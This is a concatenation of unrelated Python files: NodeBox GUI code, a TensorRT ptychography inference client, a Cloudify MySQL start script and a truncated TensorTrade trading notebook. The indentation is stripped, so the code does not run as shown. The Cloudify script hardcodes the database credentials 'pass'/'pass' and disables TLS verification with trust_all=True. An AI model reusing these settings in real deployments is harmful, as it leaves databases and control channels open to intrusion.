t = NSAffineTransform.transform()
t.scaleBy_(self.zoom)
t.concat()
clip = NSBezierPath.bezierPathWithRect_( ((0, 0), (self.canvas.width, self.canvas.height)) )
clip.addClip()
self.canvas.draw()
except:
# A lot of code just to display the error in the output view.
etype, value, tb = sys.exc_info()
if tb.tb_next is not None:
tb = tb.tb_next # skip the frame doing the exec
traceback.print_exception(etype, value, tb)
data = "".join(traceback.format_exception(etype, value, tb))
attrs = PyDETextView.getBasicTextAttributes()
attrs[NSForegroundColorAttributeName] = NSColor.redColor()
outputView = self.document.outputView
outputView.setSelectedRange_((outputView.textStorage().length(), 0))
outputView.setTypingAttributes_(attrs)
outputView.insertText_(data)
NSGraphicsContext.currentContext().restoreGraphicsState()
def _updateImage(self):
if self._dirty:
self._image = self.canvas._nsImage
self._dirty = False
# pasteboard delegate method
def pasteboard_provideDataForType_(self, pboard, type):
if type == NSPDFPboardType:
pboard.setData_forType_(self.pdfData, NSPDFPboardType)
elif type == NSPostScriptPboardType:
pboard.setData_forType_(self.epsData, NSPostScriptPboardType)
elif type == NSTIFFPboardType:
pboard.setData_forType_(self.tiffData, NSTIFFPboardType)
def _get_pdfData(self):
if self.canvas:
return self.canvas._getImageData('pdf')
pdfData = property(_get_pdfData)
def _get_epsData(self):
if self.canvas:
return self.canvas._getImageData('eps')
epsData = property(_get_epsData)
def _get_tiffData(self):
return self.canvas._getImageData('tiff')
tiffData = property(_get_tiffData)
def _get_pngData(self):
return self.canvas._getImageData('png')
pngData = property(_get_pngData)
def _get_gifData(self):
return self.canvas._getImageData('gif')
gifData = property(_get_gifData)
def _get_jpegData(self):
return self.canvas._getImageData('jpeg')
jpegData = property(_get_jpegData)
def mouseDown_(self, event):
self.mousedown = True
def mouseUp_(self, event):
self.mousedown = False
def keyDown_(self, event):
self.keydown = True
self.key = event.characters()
self.keycode = event.keyCode()
def keyUp_(self, event):
self.keydown = False
self.key = event.characters()
self.keycode = event.keyCode()
def scrollWheel_(self, event):
NSResponder.scrollWheel_(self, event)
self.scrollwheel = True
self.wheeldelta = event.deltaY()
def canBecomeKeyView(self):
return True
def acceptsFirstResponder(self):
return True
class NodeBoxAppDelegate(NSObject):
def awakeFromNib(self):
self._prefsController = None
libDir = os.path.join(os.getenv("HOME"), "Library", "Application Support", "NodeBox")
try:
if not os.path.exists(libDir):
os.mkdir(libDir)
f = open(os.path.join(libDir, "README"), "w")
f.write("In this directory, you can put Python libraries to make them available to your scripts.\n")
f.close()
except OSError: pass
except IOError: pass
@objc.IBAction
def showPreferencesPanel_(self, sender):
if self._prefsController is None:
from nodebox.gui.mac.preferences import NodeBoxPreferencesController
self._prefsController = NodeBoxPreferencesController.alloc().init()
self._prefsController.showWindow_(sender)
@objc.IBAction
def generateCode_(self, sender):
"""Generate a piece of NodeBox code using OttoBot"""
from nodebox.util.ottobot import genProgram
controller = NSDocumentController.sharedDocumentController()
doc = controller.newDocument_(sender)
doc = controller.currentDocument()
doc.textView.setString_(genProgram())
doc.runScript()
@objc.IBAction
def showHelp_(self, sender):
url = NSURL.URLWithString_("http://nodebox.net/code/index.php/Reference")
NSWorkspace.sharedWorkspace().openURL_(url)
@objc.IBAction
def showSite_(self, sender):
url = NSURL.URLWithString_("http://nodebox.net/")
NSWorkspace.sharedWorkspace().openURL_(url)
def applicationWillTerminate_(self, note):
import atexit
atexit._run_exitfuncs()
|
main-edge-sm.py
|
import time, queue, threading, sys, os
import torch, argparse, logging
from pvaccess import Channel
from pvaccess import PvObject
import pvaccess as pva
import numpy as np
import tensorrt as trt
sys.path.insert(1, '/home/nvidia-agx/Inference/')
import PtychoNN
from framePreProcess import *
from tensorrtcode_batch import *
class pvaClient:
def __init__(self, nth=1):
self.last_uid = None
self.n_missed = 0
self.n_received = None
self.frame_dims = (516, 516)
self.debug_frame = np.zeros((128,128), dtype=np.int32)
self.frame_id = None
self.trt_engine_path = 'auto_PtychoNN_sm.trt'
self.resolution = (64,64)
self.server = pva.PvaServer()
self.channel_name = 'pvapy:image1'
#self.channel_name_infer = 'pvapy:image2'
self.server.addRecord(self.channel_name, pva.NtNdArray())
self.current_frame_id = 0
self.frame_map={}
self.n_generated_frames = 2
self.rows = 128
self.cols = 128
self.rows1 = 128
self.cols1 = 128
self.trt_outputs = ()
self.max_batch_size = 1
self.base_seq_id = None
self.frames_processed =0
self.trt_inference_wrapper = TRTInference(self.trt_engine_path,
trt_engine_datatype=trt.DataType.FLOAT,
batch_size=self.max_batch_size)
self.frame_tq = queue.Queue(maxsize=-1)
self.processed_tq = queue.Queue(maxsize=-1)
self.frame_id_tq = queue.Queue(maxsize=-1)
self.thr_exit = 0
self.recv_frames = None
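# Pipeline: monitor() copies each incoming PvObject into frame_tq; the
# frame_process() worker threads started below pre-process the frames, batch
# them through the TensorRT engine and publish the inference result on the
# local PvaServer channel declared above.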
for _ in range(nth):
threading.Thread(target=self.frame_process, daemon=True).start()
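# Wraps one flattened inference output into an NTNDArray (uniqueId, dimensions,
# timestamps, ColorMode attribute) so it can be served over pvAccess like a
# normal area-detector frame.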
def frame_producer(self, frame_id, trt_outputs1, extraFieldsPvObject=None):
#for frame_id in range(0, self.n_generated_frames):
if extraFieldsPvObject is None:
nda = pva.NtNdArray()
else:
nda = pva.NtNdArray(extraFieldsPvObject.getStructureDict())
nda['uniqueId'] = frame_id
nda['codec'] = pva.PvCodec('pvapyc', pva.PvInt(5))
dims = [pva.PvDimension(self.rows, 0, self.rows, 1, False), \
pva.PvDimension(self.cols, 0, self.cols, 1, False)]
nda['dimension'] = dims
nda['compressedSize'] = self.rows*self.cols
nda['uncompressedSize'] = self.rows*self.cols
ts = self.get_timestamp()
nda['timeStamp'] = ts
nda['dataTimeStamp'] = ts
nda['descriptor'] = 'PvaPy Simulated Image'
nda['value'] = {'floatValue': trt_outputs1.flatten()}
attrs = [pva.NtAttribute('ColorMode', pva.PvInt(0))]
nda['attribute'] = attrs
if extraFieldsPvObject is not None:
nda.set(extraFieldsPvObject)
#self.frame_map[frame_id] = nda
return nda
def get_timestamp(self):
s = time.time()
ns = int((s-int(s))*1000000000)
s = int(s)
return pva.PvTimeStamp(s,ns)
def frame_process(self, ):
while self.thr_exit == 0:
try:
pv = self.frame_tq.get(block=True, timeout=1)
except queue.Empty:
continue
#logging.error("Queue is empty")
except:
#logging.error("Something else of the Queue went wrong")
continue
frm_id= pv['uniqueId']
dims = pv['dimension']
rows = dims[0]['size']
cols = dims[1]['size']
frame = pv['value'][0]['shortValue'].reshape((rows, cols))
self.frame_tq.task_done()
time0 = time.time()
processed_frame, pr_frm_id = frame_preprocess(frame, frm_id)
#print(processed_frame.max())
#print(processed_frame.sum())
#self.server.update(self.channel_name, self.frame_producer(frm_id, processed_frame))
#processed_frame = self.debug_frames
print("Time for pre-processing ", (time.time()-time0))
#for _pf in processed_frame:
self.processed_tq.put(processed_frame)
self.frame_id_tq.put(frm_id)
self.frames_processed += 1
elapsed = (time.time() - time0)
in_mb=[]
in_id = []  ## can be used to resend these ids to ImageJ
for i in range(self.max_batch_size):
_f = self.processed_tq.get()
_id = self.frame_id_tq.get()
in_mb.append(_f)
in_id.append(_id)
self.processed_tq.task_done()
self.frame_id_tq.task_done()
in_mb = np.array(in_mb)
in_id = np.array(in_id)
if (len(in_mb)==self.max_batch_size):
#print("entered for inference")
trt_outputs1, times = self.trt_inference_wrapper.infer(in_mb)
trt_outputs = np.asarray(trt_outputs1[0])
print(trt_outputs.shape)
print("Execution Times ", times)
#for _ in in_id:
self.server.update(self.channel_name, self.frame_producer(frm_id, trt_outputs1[0]))
print("Sent frame id", frm_id)
def monitor(self, pv):
uid = pv['uniqueId']
# ignore the 1st empty frame when using the sv simulator
if self.recv_frames is None:
self.recv_frames = 0
return
if self.base_seq_id is None: self.base_seq_id = uid
self.recv_frames += 1
self.frame_tq.put(pv.copy())
logging.info("[%.3f] received frame %d, total frame received: %d, should have received: %d; %d frames pending process" % (\
time.time(), uid, self.recv_frames, uid - self.base_seq_id + 1, self.frame_tq.qsize()))
#def main_monitor(ch, nth, pv_request):
# give threads seconds to exit
#c.stopMonitor()
#c.unsubscribe('monitor')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='')
parser.add_argument('-gpus', type=str, default="0", help='list of visible GPUs')
parser.add_argument('-cn', type=str, default='QMPX3:Pva1:Image', help='pva channel name')
parser.add_argument('-qs', type=int, default=10000, help='queue size')
parser.add_argument('-nth', type=int, default=1, help='number of threads for frame processes')
parser.add_argument('-terminal', type=int, default=0, help='non-zero to print logs to stdout')
#parser.add_argument('-sf', type=int, default=0, help='specifies how many frames to skip')
args, unparsed = parser.parse_known_args()
if len(unparsed) > 0:
print('Unrecognized argument(s): \n%s \nProgram exiting ... ... ' % '\n'.join(unparsed))
exit(0)
if len(args.gpus) > 0:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpus
logging.basicConfig(filename='edgePtychoNN.log', level=logging.DEBUG,\
format='%(asctime)s %(levelname)-8s %(message)s',)
if args.terminal != 0:
logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
c = Channel(args.cn)
client = pvaClient(args.nth)
c.setMonitorMaxQueueLength(args.qs)
time.sleep(1)
pv_request = ''
c.monitor(client.monitor, pv_request)
time.sleep(1)
client.frame_tq.join()
client.processed_tq.join()
client.frame_id_tq.join()
#client.thr_exit = 1
time.sleep(10000)
client.trt_inference_wrapper.destroy()
c.stopMonitor()
|
_a4c_start.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
ctx.logger.info('Check if a mapping exists for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exists and concerns SELF, just get the attribute under the mapped attribute name
# Else, if it concerns TARGET, follow the relationship and retrieve the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
ctx.logger.info('Attribute {0} not found, going up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
ctx.logger.info('Property {0} not found, going up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
ctx.logger.info('Check if a mapping exists for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exists and concerns SELF, just get the attribute under the mapped attribute name
# Else, if it concerns TARGET, follow the relationship and retrieve the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
def download(child_rel_path, child_abs_path, download_dir):
artifact_downloaded_path = ctx.download_resource(child_abs_path)
new_file = os.path.join(download_dir, child_rel_path)
new_file_dir = os.path.dirname(new_file)
if not os.path.exists(new_file_dir):
os.makedirs(new_file_dir)
os.rename(artifact_downloaded_path, new_file)
ctx.logger.info('Downloaded artifact from path ' + child_abs_path + ', it\'s available now at ' + new_file)
return new_file
def download_artifacts(artifacts, download_dir):
downloaded_artifacts = {}
os.makedirs(download_dir)
for artifact_name, artifact_ref in artifacts.items():
ctx.logger.info('Download artifact ' + artifact_name)
if isinstance(artifact_ref, basestring):
downloaded_artifacts[artifact_name] = download(os.path.basename(artifact_ref), artifact_ref, download_dir)
else:
child_download_dir = os.path.join(download_dir, artifact_name)
for child_path in artifact_ref:
download(child_path['relative_path'], child_path['absolute_path'], child_download_dir)
downloaded_artifacts[artifact_name] = child_download_dir
return downloaded_artifacts
env_map = {}
env_map['NODE'] = ctx.node.id
env_map['INSTANCE'] = ctx.instance.id
env_map['INSTANCES'] = get_instance_list(ctx.node.id)
env_map['HOST'] = get_host_node_name(ctx.instance)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx)
env_map['VOLUME_HOME'] = r'/mountedStorage'
env_map['PORT'] = r'3306'
env_map['DB_NAME'] = r'wordpress'
env_map['DB_USER'] = r'pass'
env_map['DB_PASSWORD'] = r'pass'
env_map['BIND_ADDRESS'] = r'true'
node_artifacts = {
"configs": [
{
"relative_path": "mysqld_charset.cnf",
"absolute_path": "_a4c_artifact/Mysql/configs/configs/mysqld_charset.cnf"
}
]
}
relationship_artifacts = {
}
artifacts = node_artifacts.copy()
artifacts.update(relationship_artifacts)
download_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'downloads')
env_map.update(download_artifacts(artifacts, download_dir))
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
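# Illustrative behaviour of parse_output (assuming a wrapped script that prints, in order,
# "starting service" and "EXPECTED_OUTPUT_port=3306"): the result would be
# {'last_output': 'starting service', 'outputs': {'port': '3306'}}.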
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
ctx.logger.info('Output name: {0} value: {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/Mysql/tosca.interfaces.node.lifecycle.Standard/start/start_mysql.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:start:{0}'.format(k)] = v
ctx.instance.update()
|
Tensortrade_Behavior_Cloning.py
|
# To add a new cell, type '# %%'
# To add a new markdown cell, type '# %% [markdown]'
# %%
from IPython import get_ipython
# %% [markdown]
# # Install Stable-baselines/ TensorTrade - Colab
# %%
#install stable-baselines
get_ipython().system('sudo apt-get update && sudo apt-get install cmake libopenmpi-dev zlib1g-dev')
# setup dependencies
# !python3 -m pip install git+https://github.com/tensortrade-org/tensortrade.git
get_ipython().system('python3 -m pip install git+https://github.com/essamabas/tensortrade.git@live')
get_ipython().system('pip install yfinance ta matplotlib s3fs')
# %%
get_ipython().system('pip install stable-baselines[mpi]==2.10.1')
#select tensorflow version 1. -
get_ipython().run_line_magic('tensorflow_version', '1.x')
# %%
import stable_baselines
stable_baselines.__version__
# %% [markdown]
# # Include Libraries
# %%
# setup dependencies
import inspect
import sys
import os
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
#sys.path.insert(0, "{}".format(parentdir))
sys.path.append(parentdir)
currentdir
# %%
import pandas as pd
import tensortrade.env.default as default
from tensortrade.data.cdd import CryptoDataDownload
from tensortrade.feed.core import Stream, DataFeed
from tensortrade.oms.exchanges import Exchange
from tensortrade.oms.services.execution.simulated import execute_order
# Make a stream of closing prices to make orders on
from tensortrade.oms.instruments import USD, Instrument, Quantity
from tensortrade.oms.wallets import Wallet, Portfolio
from tensortrade.agents import DQNAgent
from tensortrade.env.default.renderers import PlotlyTradingChart, FileLogger, MatplotlibTradingChart
import gym
from stable_baselines.common.vec_env import DummyVecEnv, VecNormalize
from stable_baselines.common.policies import MlpPolicy, MlpLnLstmPolicy
from stable_baselines import DQN, PPO2, A2C
from stable_baselines.gail import generate_expert_traj
import ta
import numpy as np
from datetime import datetime
from scipy.signal import argrelextrema
import yfinance as yf
from plotly.subplots import make_subplots
import plotly.graph_objects as go
# silence warnings
import warnings
warnings.filterwarnings('ignore')
get_ipython().run_line_magic('matplotlib', 'inline')
# Use these commands - to reload sources, while development
get_ipython().run_line_magic('load_ext', 'autoreload')
get_ipython().run_line_magic('autoreload', '2')
# %% [markdown]
# # Helper Functions
# %%
def download_data(symbol: str,
start_date: str,
end_date: str = datetime.today().strftime('%Y-%m-%d'),
plot: bool = False) -> pd.DataFrame:
# download Data
df = yf.download(symbol, start=start_date, end=end_date)
df.reset_index(inplace=True)
df.columns = [name.lower() for name in df.columns]
df.drop(columns=["adj close","volume"],inplace=True)
df.set_index("date",inplace=True)
if plot:
df['close'].plot()
return df
## Apply Technical-Indicators (TA)
#- Check https://github.com/bukosabino/ta
#- TA- Visualization: https://github.com/bukosabino/ta/blob/master/examples_to_use/visualize_features.ipynb
def add_custom_ta_features(
df: pd.DataFrame,
open: str, # noqa
high: str,
low: str,
close: str,
fillna: bool = False,
colprefix: str = "",
apply_pct: bool = False,
plot: bool = False,
) -> pd.DataFrame:
# Add Volatility TA
df = ta.add_volatility_ta(
df=df, high=high, low=low, close=close, fillna=fillna, colprefix=colprefix
)
# Add Trend TA
df = ta.add_trend_ta(
df=df, high=high, low=low, close=close, fillna=fillna, colprefix=colprefix
)
# Add Other TA
df = ta.add_others_ta(df=df, close=close, fillna=fillna, colprefix=colprefix)
# convert to pct
if apply_pct:
df = df.pct_change(fill_method ='ffill')
df = df.applymap(lambda x: x*100)
df.replace([np.inf, -np.inf], np.nan,inplace=True)
df = df.astype(np.float32)
df = df.round(5)
if fillna:
df.fillna(value=0,inplace=True)
if plot:
fig = make_subplots(rows=5, cols=1,
shared_xaxes=True,
vertical_spacing=0.02,
subplot_titles=("Close", "Bollinger Bands","MACD"))
fig.add_trace(go.Scatter(
x=df.index,
y=df['close'],
name = symbol
), row=1, col=1)
# Bollinger-Bands
fig.add_trace(go.Scatter(
x=df.index,
y=df['close'],
name = symbol
), row=2, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['volatility_bbh'],
name = symbol+' High BB'
), row=2, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['volatility_bbl'],
name = symbol+' Low BB'
), row=2, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['volatility_bbm'],
name = symbol+' EMA BB'
), row=2, col=1)
# MACD
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_macd'],
name = symbol+' MACD'
), row=3, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_macd_signal'],
name = symbol+' MACD Signal'
), row=3, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_macd_diff'],
name = symbol+' MACD Difference'
), row=3, col=1)
# SMA
fig.add_trace(go.Scatter(
x=df.index,
y=df['close'],
name = symbol
), row=4, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_sma_fast'],
name = symbol+' SMA-Fast'
), row=4, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_sma_slow'],
name = symbol+' SMA-Slow'
), row=4, col=1)
# EMA
fig.add_trace(go.Scatter(
x=df.index,
y=df['close'],
name = symbol
), row=5, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_ema_fast'],
name = symbol+' EMA-Fast'
), row=5, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_ema_slow'],
name = symbol+' EMA-Slow'
), row=5, col=1)
config = {'displayModeBar': False}
fig.show(config=config)
return df
def __classify(current_index, df_min, df_max):
'''
Apply Local/Min - Max analysis
'''
if current_index in df_min.index:
return 1 # buy-decision
elif current_index in df_max.index:
return -1 # sell-decision
else: # otherwise... it's a 0!
return 0 # hold-decision
def find_loc_min_max(data: pd.DataFrame,
order_of_points=7,
symbol: str = "symbol",
plot:bool = False):
'''
Find local peaks
'''
df_min_ts = data.iloc[argrelextrema(data.org_close.values, np.less_equal, order=order_of_points)[0]].astype(np.float32)
df_max_ts = data.iloc[argrelextrema(data.org_close.values, np.greater_equal, order=order_of_points)[0]].astype(np.float32)
df_min_ts = df_min_ts.iloc[:, 0:5]
df_max_ts = df_max_ts.iloc[:, 0:5]
if plot:
fig = go.Figure(data= go.Scatter(
x=data.index,
y=data['org_close'],
name = symbol
))
#fig = go.Figure([go.Scatter(x=df['Date'], y=df['AAPL.High'])])
fig.add_trace(go.Scatter(mode="markers", x=df_min_ts.index, y=df_min_ts['org_close'], name="min",marker_color='rgba(0, 255, 0, .9)'))
fig.add_trace(go.Scatter(mode="markers", x=df_max_ts.index, y=df_max_ts['org_close'], name="max",marker_color='rgba(255, 0, 0, .9)'))
config = {'displayModeBar': False}
fig.show(config=config)
return df_min_ts, df_max_ts
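# Note on order_of_points: argrelextrema with order=7 marks a row as a local minimum/maximum
# only if its org_close is <= / >= every value within 7 rows on either side, so larger values
# keep only the more prominent turning points (a rough reading of the scipy semantics).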
def create_trade_env(quotes, observations ,symbol):
# Add features
features = []
#exclude "date/Column [0]" from observation - start from column 1
for c in data.columns[0:]:
s = Stream.source(list(data[c]), dtype="float").rename(data[c].name)
features += [s]
feed = DataFeed(features)
feed.compile()
# define exchange - needs to specify Price-Quote Stream
exchange = Exchange("sim-exchange", service=execute_order)(
Stream.source(list(quotes["close"]), dtype="float").rename(str("USD-{}").format(symbol))
)
# add current cash, initial-asset
cash = Wallet(exchange, 10000 * USD)
asset = Wallet(exchange, 0 * Instrument(symbol, 2, symbol))
# initialize portfolio - base currency USD
portfolio = Portfolio(
base_instrument = USD,
wallets = [
cash,
asset
]
)
# add element for rendered feed
renderer_feed = DataFeed([
Stream.source(list(observations.index)).rename("date"),
Stream.source(list(observations["open"]), dtype="float").rename("open"),
Stream.source(list(observations["high"]), dtype="float").rename("high"),
Stream.source(list(observations["low"]), dtype="float").rename("low"),
Stream.source(list(observations["close"]), dtype="float").rename("close")
#Stream.source(list(observations["volume"]), dtype="float").rename("volume")
])
reward_scheme = default.rewards.SimpleProfit()
action_scheme = default.actions.SimpleOrders(trade_sizes=1)
'''
# define reward-scheme
# define action-scheme
action_scheme = default.actions.BSH(
cash=cash,
asset=asset
)
'''
# create env
env = default.create(
portfolio=portfolio,
action_scheme=action_scheme,
reward_scheme=reward_scheme,
feed=feed,
renderer_feed=renderer_feed,
#renderer="screen-log",
#window_size=20,
max_allowed_loss=0.6
)
return env
def evaluate_model(model, env, num_steps=1000):
"""
Evaluate a RL agent
:param model: (BaseRLModel object) the RL Agent
:param env: Trading-Env to be used
